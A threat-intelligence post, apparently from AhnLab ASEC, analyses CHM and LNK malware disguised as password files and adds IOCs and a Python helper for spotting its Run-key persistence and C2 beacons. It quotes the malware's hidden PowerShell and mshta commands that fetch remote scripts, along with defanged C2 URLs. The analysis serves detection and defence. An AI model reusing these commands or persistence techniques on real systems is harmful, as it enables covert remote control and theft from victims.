Malware Distributed Disguised as a Password File

AhnLab Security Emergency response Center (ASEC) discovered a malware strain disguised as a password file, distributed alongside a normal file inside a compressed archive last month. Because the malware is bundled with a legitimate file, it is difficult for users to recognize it as malicious. The recently discovered samples were in CHM and LNK file formats. The CHM file is of the same type as the malware covered in the post referenced below and is assumed to have been created by the same threat group.

It is believed that the CHM and LNK files are distributed compressed together with a normal, password-protected file. Users are led to execute the CHM or LNK file because it appears to hold the password for the password-protected Excel or HWP file.

Figure 1. Inside the compressed files

Although the two types were distributed in the same format, the malicious behaviors they ultimately execute suggest that they were created by different groups.

  • CHM Type

Executing passwd.chm or Password.chm, shown in Figure 1, displays the password to the locked file and simultaneously triggers the malicious script embedded in the CHM.

Figure 2. Help screen displayed when passwd.chm is executed

Figure 3. Contents of Shoes.xlsx that is displayed upon unlocking the file

Figure 4. Help screen displayed when Password.chm is executed

Figure 5. Contents of 2020_normal_ko.hwp that is displayed upon unlocking the file

Below is an example of the malicious script found in the CHM files. It uses the mshta process to fetch and execute an additional script hosted at a malicious URL.

Figure 6. Malicious script within the CHM file

The additional script run through mshta is in the same format as the command shared in the post <CHM Malware Disguised as Security Email from a Korean Financial Company: RedEyes(ScarCruft)>. This script registers itself in the RUN key for persistence, receives commands from the threat actor's server, and transmits the command execution results.

Figure 7. Malicious script found within 1.html

  • RUN key registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: icxrNpVd
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc.kr/skin/product/1.html
  • C2
    Receives threat actor’s commands – hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer Name]+[Username]
    Transmits command execution results – hxxp://shacc[.]kr/skin/product/mid.php?R=[Base64-encoded]

Figure 8. Malicious script found within 11.html

  • RUN key registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: aeF
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 496433 2.2.2.2 || mshta hxxp://141.105.65.165/data/11.html
  • C2
    Receives threat actor’s commands – hxxp://141.105.65.165/data//mid.php?U=[Computer Name]+[Username]
    Transmits command execution results – hxxp://141.105.65.165/data/mid.php?R=[Base64-encoded]
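The Run-key value and the mid.php URL formats above lend themselves to a small triage helper. The following Python is an added example, not code from the ASEC post or from the malware itself. The two Run-key values are the strings quoted above; the benign OneDrive entry, the host and user names, and the Base64 result payload are constructed assumptions. It reads `ping -n 1 -w <ms> 2.2.2.2 || mshta <url>` as a delayed execution: a single ping to an address that is expected not to reply fails once the -w timeout expires, and `||` then runs mshta, so the timeout is effectively a sleep (361881 ms and 496433 ms, roughly six and eight minutes) before the script is fetched.

```python
# Added example (not from the ASEC post and not the threat actor's code):
# parse the persistence value and the C2 URL formats described above.
# The two Run-key values below are the strings quoted in the post; the
# OneDrive entry, host names, user names and the result payload are
# constructed for illustration.
import base64
import re
from urllib.parse import quote, unquote, urlsplit

# Persistence shape: "ping -n 1 -w <ms> <ip> || mshta <url>".  One ping to an
# address that does not answer fails once the -w timeout (milliseconds)
# expires, so the "||" branch runs mshta after that delay.
RUN_PATTERN = re.compile(
    r"ping\s+-n\s+(?P<count>\d+)\s+-w\s+(?P<wait_ms>\d+)\s+(?P<target>\S+)"
    r"\s*\|\|\s*mshta(?:\.exe)?\s+(?P<url>\S+)",
    re.IGNORECASE,
)

SAMPLE_RUN_VALUES = {
    "icxrNpVd": r"c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc.kr/skin/product/1.html",
    "aeF": r"c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 496433 2.2.2.2 || mshta hxxp://141.105.65.165/data/11.html",
    # Constructed benign entry so the scan has something to ignore.
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}


def defang(url: str) -> str:
    """Neutralise a URL for reporting; safe to call on already defanged input."""
    scheme, sep, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    host = host.replace("[.]", ".").replace(".", "[.]")
    return scheme.lower().replace("http", "hxxp") + sep + host + slash + path


def refang(url: str) -> str:
    """Undo defang() so the URL can be parsed by urllib."""
    return url.replace("hxxp", "http", 1).replace("[.]", ".")


def analyze_run_value(name: str, value: str):
    """Return a finding dict if the Run-key value matches the delayed-mshta pattern."""
    m = RUN_PATTERN.search(value)
    if m is None:
        return None
    return {
        "value_name": name,
        "delay_ms": int(m.group("wait_ms")),
        "ping_target": m.group("target"),
        "c2_url": defang(m.group("url")),
        "hidden_window": re.search(r"-WindowStyle\s+hidden", value, re.I) is not None,
        "policy_bypass": re.search(r"-(?:ep|ExecutionPolicy)\s+bypass", value, re.I) is not None,
    }


def scan_run_values(values: dict) -> list:
    """Scan a {value_name: command} mapping (e.g. exported from HKCU\\...\\Run)."""
    return [f for f in (analyze_run_value(n, v) for n, v in values.items()) if f]


def _query_params(query: str) -> dict:
    # parse_qs would turn '+' into a space, which corrupts Base64 in R=;
    # split by hand and only percent-decode.
    out = {}
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        out[key] = unquote(val)
    return out


def parse_beacon(url: str):
    """Classify a request to the mid.php endpoint: U= is check-in, R= carries results."""
    parts = urlsplit(refang(url))
    if not parts.path.endswith("/mid.php"):
        return None
    params = _query_params(parts.query)
    if "U" in params:
        computer, _, user = params["U"].partition("+")
        return {"kind": "checkin", "computer": computer, "user": user}
    if "R" in params:
        try:
            decoded = base64.b64decode(params["R"], validate=True).decode("utf-8", "replace")
        except ValueError:
            decoded = None
        return {"kind": "result", "decoded": decoded}
    return {"kind": "unknown"}


# Constructed beacon URLs in the format the post describes.
SAMPLE_CHECKIN_URL = "hxxp://shacc[.]kr/skin/product/mid.php?U=DESKTOP-1+alice"
SAMPLE_RESULT_URL = "hxxp://141.105.65.165/data/mid.php?R=" + quote(
    base64.b64encode(b"whoami\r\ndesktop-1\\alice\r\n").decode()
)

if __name__ == "__main__":
    for finding in scan_run_values(SAMPLE_RUN_VALUES):
        print(f"{finding['value_name']}: sleeps {finding['delay_ms'] / 1000:.0f}s then mshta {finding['c2_url']}")
    print(parse_beacon(SAMPLE_CHECKIN_URL))
    print(parse_beacon(SAMPLE_RESULT_URL))
```

In practice, feed scan_run_values() a mapping exported from the Run key (a .reg dump or Sysmon registry events) and parse_beacon() the request URLs from proxy logs; the query is split by hand because parse_qs would convert a '+' inside the Base64 result into a space.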

  • LNK Type

When executed, the password.txt.lnk file shown in Figure 1 creates a text file containing the password and a malicious VBS script in the %temp% folder.

Figure 9. Additional script and password.txt file that is created

Figure 10. Contents of PersonalDataUseAgreement.hwp that is displayed upon unlocking the file

As shown below, the VBS file runs the additional malicious script hosted at hxxp://hondes.getenjoyment[.]net/denak/info/list.php?query=1.

Figure 11. Created VBS file

Judging by the URL format, the LNK type is the same as the malware covered in the post below, which leads the team to believe that it was created by the same threat group.

This type of malware can perform a variety of malicious behaviors according to the threat actor's intentions. Furthermore, since several other threat groups also distribute malware bundled with a normal file, the team expects that other variants exist beyond the CHM and LNK files confirmed so far. As various forms of malware are being distributed to Korean users in this way, users are advised to always check the sender of the emails they receive and to be especially cautious about opening attached files.

[File Detection]
Trojan/CHM.Agent (2023.03.08.03)
Dropper/LNK.Agent (2023.02.28.00)

[IOC]
MD5
809528921de39530de59e3793d74af98 – CHM
b39182a535f41699280ca088eef0f258 – CHM
2b79e2bd6548118c942480a52b5a1669 – LNK

C2
hxxp://shacc.kr/skin/product/1.html
hxxp://141.105.65.165/data/11.html
hxxp://hondes.getenjoyment.net/denak/info/list.php?query=1

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
